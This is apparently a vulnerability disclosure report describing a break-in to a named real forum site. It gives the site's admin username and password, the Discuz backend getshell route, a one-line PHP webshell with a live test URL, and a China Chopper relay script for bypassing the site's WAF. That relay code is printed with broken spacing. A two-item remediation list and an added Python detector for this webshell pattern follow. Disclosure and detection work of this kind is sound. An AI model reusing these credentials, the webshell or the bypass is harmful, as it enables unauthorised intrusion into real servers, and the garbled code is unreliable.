A weak password on a Huaxia Mingwang sub-site leads to getshell (weak passwords need strengthening and patches need installing)
A weak password on a Huaxia Mingwang sub-site leads to getshell (a case study of the Cloud Lock WAF)
Straight to the point: the site is http://bbs.sudu.cn/
Weak password: username admin, password qwer
Log in to the admin backend and look around. It is Discuz! X3.2 Release 20140603. Judging by the small number of users on the front end, there is a high chance that it is an unpatched version, so try getshell. Reference:
WooYun: Discuz3.2 backend file inclusion vulnerability, getshell from the backend
I will not go through the specific steps at length. There is one small detail: you must map the server's actual IP address in your local hosts file, otherwise the WAF will intercept the requests (as for how to obtain the actual IP address, the simplest way is to test the mail-sending function).
Through the "File Check" function in the backend, we can clearly see that the one-line webshell file was generated successfully.
Visit it in the browser.
The WAF intercepts it, so China Chopper (the "kitchen knife" client) probably cannot connect either.
Sure enough, it was blocked as well. After digging through earlier posts in the WooYun zone, I finally got through. Here is how.
1. Modify the one-liner
$_REQUEST['a']($_REQUEST['b']);?>
Using the getshell method above, write the new one-liner to the root directory. It is then reachable at http://bbs.sudu.cn/help.php
Test it with http://bbs.sudu.cn/help.php?a=assert&b=phpinfo();
2. Create shell.php and put the China Chopper relay (conversion) script in it.
$ Target = "http://bbs.sudu.cn/help.php"; // the address of the previous sentence $ poststr = ''; $ I = 0; foreach ($ _ POST as $ k => $ v) {if (strstr ($ v, "base64_decode") {$ v = str_replace ("base64_decode (", "", $ v); $ v = str_replace (")) ",") ", $ v);} else {if ($ k =" z0 ") $ v = base64_decode ($ v);} $ pp = $ k. "= ". urlencode ($ v); // echo ($ pp); if ($ I! = 0) {$ poststr = $ poststr. "&". $ pp;} else {$ poststr = $ pp;} $ I = $ I + 1;} $ ch = curl_init (); $ curl_url = $ target. "? ". $ _ SERVER ['query _ string']; curl_setopt ($ ch, CURLOPT_URL, $ curl_url); curl_setopt ($ ch, CURLOPT_POST, 1); curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ poststr); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); $ result = curl_exec ($ ch); curl_close ($ ch); echo $ result;?>
3. Set up a PHP environment locally, place the relay script in it, and connect China Chopper to it.
Fill in http://127.0.0.1:8004/shell.php?a=assert as the address and enter b as the password.
The bypass succeeded.
Solution:
1. Strengthen weak passwords
2. Install patches for open-source programs in a timely manner
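
For defenders, a detection sketch for the one-liner pattern used in this report (added example, not part of the original report): it flags PHP source that calls a request parameter as a function, and access-log lines whose query string passes a code-executing callable name such as `a=assert`. The callable list, function names, and sample data are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request superglobal used as a function name, e.g. $_REQUEST['a'](...)
DYNAMIC_CALL = re.compile(
    r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[\s*['\"]?\w+['\"]?\s*\]\s*\(")

# PHP callables that evaluate or execute their argument (assumed, non-exhaustive)
EXEC_CALLABLES = {"assert", "eval", "system", "exec", "passthru",
                  "shell_exec", "popen", "proc_open", "call_user_func",
                  "create_function"}

def scan_php_source(source):
    """Return 1-based line numbers where a request value is called as a function."""
    return [n for n, line in enumerate(source.splitlines(), 1)
            if DYNAMIC_CALL.search(line)]

def suspicious_params(request_target):
    """Return (name, value) query pairs whose whole value is an exec-style callable."""
    query = urlsplit(request_target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.strip().lower() in EXEC_CALLABLES]

def scan_access_log(lines):
    """Yield (client_ip, path, hits) for combined-format lines with suspicious params."""
    request = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = request.match(line)
        if m:
            hits = suspicious_params(m.group(2))
            if hits:
                yield m.group(1), urlsplit(m.group(2)).path, hits

# Constructed sample data (not taken from the site in the report)
SAMPLE_PHP = "<?php\n// help page\n$_REQUEST['a']($_REQUEST['b']);\n?>"
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2015:10:00:00 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2015:10:00:05 +0800] "POST /help.php?a=assert HTTP/1.1" 200 87',
    '198.51.100.9 - - [01/Jan/2015:10:01:00 +0800] "GET /search.php?q=assert+in+php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan_php_source(SAMPLE_PHP))
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Matching on the whole parameter value keeps ordinary searches that merely contain the word "assert" from being flagged; the POST body is not visible in standard access logs, so the query-string parameter is the part this check can see.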